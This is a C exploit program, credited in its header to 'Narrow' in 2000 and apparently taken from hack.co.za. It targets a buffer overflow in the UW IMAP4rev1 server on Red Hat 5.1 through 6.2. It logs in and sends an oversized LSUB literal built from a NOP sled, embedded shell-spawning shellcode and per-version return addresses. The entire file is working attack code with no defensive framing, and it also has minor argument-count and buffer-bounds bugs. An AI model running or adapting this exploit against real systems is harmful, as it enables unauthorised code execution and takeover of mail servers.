/* Exploit by Narrow <nss@privacyx.com>  (29 September 2000) */

#include <stdio.h>
#include <string.h>

struct types {
  char *imapver;
  unsigned long ret_addr;
  int offset;
};

struct types types[] = {
  {"Red Hat 6.2 - IMAP4rev1 v12.264",0xbffff2c8,0},
  {"Red Hat 6.1 - IMAP4rev1 v12.250",0xbffff2c4,0},
  {"Red Hat 6.0 - IMAP4rev1 v12.250",0xbffff2f0,0},
  {"Red Hat 5.2 - IMAP4rev1 v11.241",0xbffff320,0},
  {"Red Hat 5.1 - IMAP4rev1 v10.223",0xbffff31c,0},
  {NULL,0,0}
};

char shellcode[] = /* shellcode from imapx.c */
  "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
  "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
  "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
  "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
  "\x2f\x32\x39\x3e\x2f\x43\x38"; 

int main(int argc, char **argv)
{
  char buf[1064];
  int i,type;
  
  if(argc < 3) {
    printf("Usage: %s <username> <password> <type>\n\n", argv[0]);
    printf("Type:\n");
    for(i=0; i<=4; i++) printf("%d - %s\n", i, types[i].imapver);
      return 0;
  }
  type = atoi(argv[3]);
  memset(buf, 0x90, 1032);
  memcpy(buf+613, shellcode, strlen(shellcode));
  for(i=strlen(shellcode)+613; i<=1064; i+=4)
    *(long *)&buf[i] = (unsigned long)types[type].ret_addr - types[type].offset;
  printf("1 LOGIN %s %s\r\n", argv[1], argv[2]);
  printf("1 LSUB \"\" {1064}\r\n");
  for(i=0; i<1064; i++) putchar(buf[i]);
    printf("\r\n");
}
/*                www.hack.co.za           [23 April 2001]*/